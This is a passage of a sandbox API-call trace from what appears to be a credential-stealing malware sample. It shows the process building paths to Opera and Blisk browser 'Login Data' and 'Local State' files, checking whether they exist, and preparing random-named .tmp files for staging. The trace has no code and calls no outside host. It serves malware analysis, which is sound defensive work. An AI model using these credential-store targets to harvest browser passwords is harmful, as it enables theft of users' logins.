flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.339] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.339] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.339] lstrlenW (lpString="\\Opera Software\\Opera Stable\\Login Data") returned 39 [0203.339] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.339] lstrlenW (lpString="\\Opera Software\\Opera Stable\\Login Data") returned 39 [0203.339] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Opera Software\\Opera Stable\\Login Data" | out: lpString1="\\Opera Software\\Opera Stable\\Login Data") returned="\\Opera Software\\Opera Stable\\Login Data" [0203.339] lstrlenW (lpString="\\Opera Software\\Opera Stable\\Login Data") returned 39 [0203.339] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.339] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.339] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.340] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.340] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Opera Software\\Opera Stable\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data" [0203.340] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.341] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.341] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.341] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.341] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.341] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.341] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.341] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.341] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.342] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.342] lstrlenW (lpString="\\Opera Software\\Opera Stable\\Local State") returned 40 [0203.342] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.342] lstrlenW (lpString="\\Opera Software\\Opera Stable\\Local State") returned 40 [0203.342] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Opera Software\\Opera Stable\\Local State" | out: lpString1="\\Opera Software\\Opera Stable\\Local State") returned="\\Opera Software\\Opera Stable\\Local State" [0203.342] lstrlenW (lpString="\\Opera Software\\Opera Stable\\Local State") returned 40 [0203.342] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.342] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.342] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.343] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.343] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Opera Software\\Opera Stable\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Local State" [0203.343] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.343] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 0 [0203.344] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.344] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.344] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.345] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.345] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.345] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.345] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.345] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.345] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.345] lstrlenW (lpString="\\") returned 1 [0203.346] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.346] lstrlenW (lpString="\\") returned 1 [0203.346] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.346] lstrlenW (lpString="\\") returned 1 [0203.346] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.346] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.346] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.347] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.347] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.347] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.348] GetProcessHeap () returned 0x900000 [0203.348] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.348] lstrlenA (lpString="Fjyy.jr") returned 7 [0203.348] lstrlenA (lpString="Fjyy.jr") returned 7 [0203.348] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.348] lstrcpyA (in: lpString1=0x2d80000, lpString2="Fjyy.jr" | out: lpString1="Fjyy.jr") returned="Fjyy.jr" [0203.348] lstrlenA (lpString="Fjyy.jr") returned 7 [0203.348] lstrlenA (lpString="Fjyy.jr") returned 7 [0203.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.348] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.349] lstrlenA (lpString="Fjyy.jr") returned 7 [0203.349] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="Fjyy.jr") returned 8 [0203.349] lstrlenW (lpString="Fjyy.jr") returned 7 [0203.349] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.349] lstrlenW (lpString="Fjyy.jr") returned 7 [0203.349] lstrcpyW (in: lpString1=0x2df0000, lpString2="Fjyy.jr" | out: lpString1="Fjyy.jr") returned="Fjyy.jr" [0203.349] lstrlenW (lpString="Fjyy.jr") returned 7 [0203.349] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.350] lstrcpyW (in: lpString1=0x2e20000, lpString2="Fjyy.jr" | out: lpString1="Fjyy.jr") returned="Fjyy.jr" [0203.350] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.350] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.350] lstrlenW (lpString="Fjyy.jr") returned 7 [0203.350] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.351] lstrcatW (in: lpString1="", lpString2="Fjyy.jr" | out: lpString1="Fjyy.jr") returned="Fjyy.jr" [0203.351] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.351] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.351] GetProcessHeap () returned 0x900000 [0203.351] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.351] lstrlenW (lpString="Fjyy.jr") returned 7 [0203.351] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.351] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.352] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.352] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.352] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Fjyy.jr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Fjyy.jr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Fjyy.jr" [0203.352] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.353] lstrlenW (lpString=".tmp") returned 4 [0203.353] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.353] lstrlenW (lpString=".tmp") returned 4 [0203.353] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.353] lstrlenW (lpString=".tmp") returned 4 [0203.353] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Fjyy.jr") returned 53 [0203.353] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.353] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.353] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.354] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Fjyy.jr", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Fjyy.jr.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Fjyy.jr.tmp" [0203.354] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.354] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.354] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.354] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.355] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.355] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.355] lstrlenW (lpString="\\") returned 1 [0203.355] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.355] lstrlenW (lpString="\\") returned 1 [0203.355] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.355] lstrlenW (lpString="\\") returned 1 [0203.355] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.355] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.355] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.356] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.356] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.356] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.356] GetProcessHeap () returned 0x900000 [0203.356] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.356] lstrlenA (lpString="usrECvu") returned 7 [0203.356] lstrlenA (lpString="usrECvu") returned 7 [0203.356] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.357] lstrcpyA (in: lpString1=0x2d80000, lpString2="usrECvu" | out: lpString1="usrECvu") returned="usrECvu" [0203.357] lstrlenA (lpString="usrECvu") returned 7 [0203.357] lstrlenA (lpString="usrECvu") returned 7 [0203.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.357] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.357] lstrlenA (lpString="usrECvu") returned 7 [0203.357] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="usrECvu") returned 8 [0203.357] lstrlenW (lpString="usrECvu") returned 7 [0203.357] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.358] lstrlenW (lpString="usrECvu") returned 7 [0203.358] lstrcpyW (in: lpString1=0x2e20000, lpString2="usrECvu" | out: lpString1="usrECvu") returned="usrECvu" [0203.358] lstrlenW (lpString="usrECvu") returned 7 [0203.358] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.358] lstrcpyW (in: lpString1=0x2eb0000, lpString2="usrECvu" | out: lpString1="usrECvu") returned="usrECvu" [0203.358] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.359] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.359] lstrlenW (lpString="usrECvu") returned 7 [0203.359] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.359] lstrcatW (in: lpString1="", lpString2="usrECvu" | out: lpString1="usrECvu") returned="usrECvu" [0203.359] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.360] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.360] GetProcessHeap () returned 0x900000 [0203.360] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.360] lstrlenW (lpString="usrECvu") returned 7 [0203.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.360] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.360] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.360] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.361] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="usrECvu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\usrECvu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\usrECvu" [0203.361] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.361] lstrlenW (lpString=".tmp") returned 4 [0203.361] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.361] lstrlenW (lpString=".tmp") returned 4 [0203.361] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.361] lstrlenW (lpString=".tmp") returned 4 [0203.361] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\usrECvu") returned 53 [0203.361] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.361] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.362] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.362] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\usrECvu", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\usrECvu.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\usrECvu.tmp" [0203.362] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.362] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.362] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.363] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.363] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.363] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.363] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.363] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.363] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.363] lstrlenW (lpString="\\Blisk\\User Data\\Default\\Login Data") returned 35 [0203.363] VirtualAlloc (lpAddress=0x0, dwSize=0x48, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.364] lstrlenW (lpString="\\Blisk\\User Data\\Default\\Login Data") returned 35 [0203.364] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Blisk\\User Data\\Default\\Login Data" | out: lpString1="\\Blisk\\User Data\\Default\\Login Data") returned="\\Blisk\\User Data\\Default\\Login Data" [0203.364] lstrlenW (lpString="\\Blisk\\User Data\\Default\\Login Data") returned 35 [0203.364] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.364] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.364] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.364] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.364] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Blisk\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Blisk\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Blisk\\User Data\\Default\\Login Data" [0203.364] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.365] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.365] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.365] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.365] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.365] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.365] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.366] lstrlenW (lpString="\\Blisk\\User Data\\Local State") returned 28 [0203.366] VirtualAlloc (lpAddress=0x0, dwSize=0x3a, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.366] lstrlenW (lpString="\\Blisk\\User Data\\Local State") returned 28 [0203.366] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Blisk\\User Data\\Local State" | out: lpString1="\\Blisk\\User Data\\Local State") returned="\\Blisk\\User Data\\Local State" [0203.366] lstrlenW (lpString="\\Blisk\\User Data\\Local State") returned 28 [0203.366] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.366] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.366] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.366] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.366] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Blisk\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Blisk\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Blisk\\User Data\\Local State" [0203.366] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.367] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Blisk\\User Data\\Default\\Login Data") returned 0 [0203.367] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.367] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.367] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.368] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.368] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.368] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.368] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.368] lstrlenW 